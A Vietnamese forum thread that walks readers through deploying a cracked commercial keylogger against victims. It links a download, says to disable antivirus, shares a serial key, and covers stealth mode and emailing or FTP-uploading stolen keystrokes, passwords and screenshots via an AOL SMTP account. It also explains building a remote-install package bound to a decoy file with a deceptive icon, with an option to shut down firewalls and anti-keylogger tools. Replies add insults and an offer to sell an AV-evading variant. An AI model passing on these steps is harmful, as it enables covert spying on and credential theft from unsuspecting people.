tui biết trước đây có rất nhiều bác vừa hướng dẫn phần này nhưng chưa đúng cho lắm lên hôm nay tui hướng dẫn đúng lại cho bà con để bắt mấy con gà

link download ban full có thể tạo virus truyền nhiễm

http://cloud.liketly.com/TQI8PUc8X6l62E8
pass: ketnooi.com

Tắt diệt virus của bạn đi rồi mới có thể dụng được nó

(Với những bản dùng thử không thể tạo được virus load lên mạng lên phải download link bản full của tui không sợ có virus đâu tí nữa tui cho cả file nhận dạng máy có dính keylog hay không kaka dùng già đời rùi mà)

Cách làm:

Các chức năng:

•Có thể hoàn toàn ẩn vô hình, kể cả đối với tường lửa

•Giám sát định kì (ảnh chụp màn hình)

•Chụp các thông tin trên màn hình sau bất cứ cú click chuột nào

•Báo cáo log các dòng vừa gõ trong tất cả chương trình

•Ghi lại password ẩn dưới các dấu sao

•Ghi lại các cú nhấn nút

•chức năng ghi log các website

•Báo cáo log chat AOL/ICQ/AIM/Yahoo

•Bộ lọc hoạt động online

•Khả năng phát hiện từ khoá và thông báo – cao cấp

•Ghi log clipboard

•Gửi log và ảnh chụp màn hình qua e-mail trong chế độ ẩn

•Log upload lén lút qua FTP

•Cài đặt/cập nhật/gỡ bỏ từ xa

•Các file log được mã hoá và có thể bảo vệ bằng mật (an ninh) khẩu

•Theo dõi tất cả người dùng trên PC, thậm chí cả khi bạn không biết mật (an ninh) khẩu của họ

•Dễ dàng xem và quản lí log

•Xuất log ra định dạng HTML

•Có thể chỉ rõ chương trình cần giám sát

•Hỗ trợ tất cả phiên bản Windows, trong đó có Windows XP

•Rất dễ sử dụng

Name: the_lighthouse

Serial: SBTY-SOQO-OASV-GFNE

Next - > trọn ” Yes ” next - > next

các bạn trọn ” Setalth ….. ” để ẩn phần mềm khỏi taskbar

next trọn Finish để hoàn thành phần cài đặt

Sau khi chuyện cài đặt hoàn tất phần mềm sẽ đòi hỏi các bạn nhập seria number

Giao diện sau khi cài xong!

Sau khi nhập Seria chuyện cài đặt vừa hoàn tất chúng ta bắt đầu cài đặt thông tin điều khiển cho perfect

Kick vào biểu tượng trọn Options.. để vào thư mục cài đặt thông tin cho Keylog

các bạn làm theo các buớc trên Giao diện

Sau khi trọn các cột bạn nhớ phần ” mặc định để gọi bảng điều khiển keylog ra bằng phím tắt “

Next

Sau khi trọn các mục bạn Set pass cho bảng điều khiển khi gọi ra

Next

Theo tui mục này bạn không nên để Capture ( quay phim ) vì sẽ làm file gửi về có dung lượng rất lớn

Bây giò chuyển qua muịc cài đặt giữ liệu để email gửi về , đây là mục rất quan trọng , nếu bạn làm lỗi email sẽ không được gửi về đúng địa chỉ chúng ta mặc định

Ở phần : ” Scheduler ” các bạn trọn khoảng cách thời (gian) gian mail gửi về , dánh dấu tất cả các mục trừ mục ” Send only log size … ” la` tuy` các bạn trọn dung lượng đến đâu mail sẽ gủi về ( theo tui thì không trọn mục này )

Lên lịch cho keylog để gửi ghi chép về qua mail ( chú ý đánh dấu vào ô try to send logs… ) Các tùy chọn là do bạn: thời (gian) gian gửi mỗi lần, dung lượng mail gửi đi, gửi ghi chép gồm những gì ( hình ảnh, chat logs,…)

Tiếp theo phần ” Delivery ” là mục cốt lõi

Đánh dấu ” Use mail account .. “

PHẦN CÓ THỂ NÓI LÀ QUAN TRỌNG NHẤT

các bạn vào trang aol.com tạo 1 tài khoản

Mục ” Sent to ” các bạn Đánh tên hòm mail vừa tạo (vd: ) nhận thông tin keylog gửi về.

Mục ” SMTP Sever ” các bạn điền : smtp.aol.com

Mục ” Port number ” mặc định 25

Mục “Usename ” bạn điền tên đăng nhập của hòm mail vừa đăng kí ở aol.com

Mục “Password ” bạn điền pass vừa đăng kí ở aol.com

Mục” Authentication method ” bạn để nghuyên rồi ấn vào chữ ” Sent Test ” để thử xem chuyện cài đặt thông tin có thành công không . Nếu nhận được thông báo ” Test message was sent succesfully . Check your mailbox ” tức là chuyện cài đặt vừa thành công.

Test thành công!

Ai vừa sử dụng các phần mềm ftp upload thì sẽ rõ những thông tin này thôi

Alerts: Bạn có thể tạo 1 list các ký hiệu, từ ngữ … mà khi keylog ghi lại được nó sẽ lập tức thông báo lại cho bạn ! <== ít xài

Targets: Mặc định là keylog sẽ ghi lại toàn bộ hoạt động, tuy nhiên bạn có thể chọn theo dõi 1 vài chương trình nào đó bằng cách đẩy dấu chọn xuống “Enable logging in the following…” sau đó chọn đường dẫn đến file cần theo dõi hoạt động hay add title của chương trình vào !

Cái này dùng để theo dõi máy mình luôn cho nó chạy cùng chương trình nào đó chung với máy để khi khởi động ct đó thì Keylog cũng hoạt động!

“Select the pạckage actions” :

Trong phần what do you want to do ? Có 2 tùy chọn ở trên là tạo file remote để cài đặt mới keylog trên các pc nhận file remote này, lựa chọn thứ 2 ở dưới là tạo file remote để tháo gỡ keylog vừa cài trên máy nạn nhân !

Bạn chọn ô trên để tạo file cài đặt !

Ở dưới là Notify me when the remote installation package will be launch => để dấu chọn vào đây keylog sẽ gửi thông báo cho bạn khi vừa cài đặt thành công trên pc của victim bằng email hay ftp !

Tùy chọn cuối cùng để file remote tự đóng các soft antikeylog, firewall,.. khi hoạt động !

chon xong bạn next để qua bước tiếp theo

“Specify deployment package options”:

Specify the file to combine with the keylog: bạn chọn đường dẫn đến 1 file bất kỳ để kẹp chung với keylog ( file gì cũng được )

Install to the following …: bạn chọn đưòng dẫn đến thư mục mà keylog sẽ được càivào ( ví dụ C:\WINDOWS )

sau rùi next và finish là xong, file remote được tạo ra có tên là inst_xxx trong đó xxx là tên file bạn kẹp vô cùng keylog và nằm cùng thư mục với file này !

Bạn có thể upload file này len host, attack vô email để gửi đi !

Kết thúc thành công chuyện cài đặt , chúng ta chuyển sang bước tạo file keylog để gửi cho nạn nhân

Kick vào biểu tượng trọn ” Remote installation “

Next

Đánh dấu mục ” Notify when the installation .. ” rồi

Next

Phần ” Browse ” bạn trọn file đính keylog

Chọn Icon cho file nhúng Trojan! Cái này tuy chỉ là 1 bước nhỏ nhưng khá quan trọng để lừa nạn nhân! nên chọn “thông minh” một chút để lừa. (Chẳng hạn file.exe thì không để kí hiệu Text là gì cả, nhìn là biết “ngụy trang” ngay)

Next -> Next -> Finish . ( file keylog nhận đuọc có tên ” inst_ + tên file gốc đính kèm ” )

Bạn vừa hoàn thành chuyện tạo file keylog và bây giờ chỉ chuyện gửi cho nạn nhân và chờ đợi email gửi về .

o0omyluvo0o

Anh co njk chat không hướng dẫn cho em dj sao em lam không dc Y!H em la` bonno907 xjn anh add chj~ dan~ cho em

---------- Bài thêm lúc 21:35 ---------- Bài trước là lúc 21:34 ----------

Anh add Y!H em nhá : bonno907 .... hjhj nếu cài được em cảm ơn

djnhthang_kute

sao em k đăng ký được nick ở aol.com anh có nick nào k cho em 1 nick Phần mềm yahoo yeuanhah_sephangdiem

p6_q6

anhxibum Mình cũng làm 1 con, gửi cho Admin VNZ mỗi anh em làn 1 con thử luôn với ADMIN và chủ thớt

cái *** mẹ *** có chiệu suy nghĩ, bảo add nick chỉ là sao

---------- Bài thêm lúc 14:42 ---------- Bài trước là lúc 14:36 ----------

hai thằng cặt này rảnh thiệt

Curney

mạng Aol chỉ cho người ở Mỹ lập tài khoản thôi,vì nó bắt nhập mã xác nhận qua số điện thoại ở Mỹ,nếu bạn nào muốn lập thì có thể nhờ người quen ở Mỹ lập cho,số điện thoại ở VN không kích hoạt được

hackermoi cái *** mẹ *** có chiệu suy nghĩ, bảo add nick chỉ là sao

---------- Bài thêm lúc 14:42 ---------- Bài trước là lúc 14:36 ----------

hai thằng cặt này rảnh thiệt bị ban rôi mà vẫn còn lập nick mới nói dc

mà chả ai rỗi hơi đi down cái này về làm k ai tự dưng HD cách hack hay cách kiếm tiền cho mình

Aibne

vpro_hkblack_93 add njck đó tui bán cho phiên bản hack vcoin bằng web chẳng hạn như cuahangvtc.com

haivan13_6

mẹ thằng này ranh để tạo clone nick thật admin 1 phát bay hết đầu tụi nó đi!!

hidenam

2k12 rồi mà còn xài perfect keylogger nữa à , Av diệt 1 phát .... mà nhìn qua nhìn lại thấy cái bài viết là biết không có ai tạo dc con keylog nào rồi ....

Wilmer

Thời buổi này còn xài perfect àh tớ có con không bị AV fát hiện nè [ trừ kis ra (kis đỉh ghê )] và tớ cũg xài gmail ngon lành

Các chủ đề có liên quan khác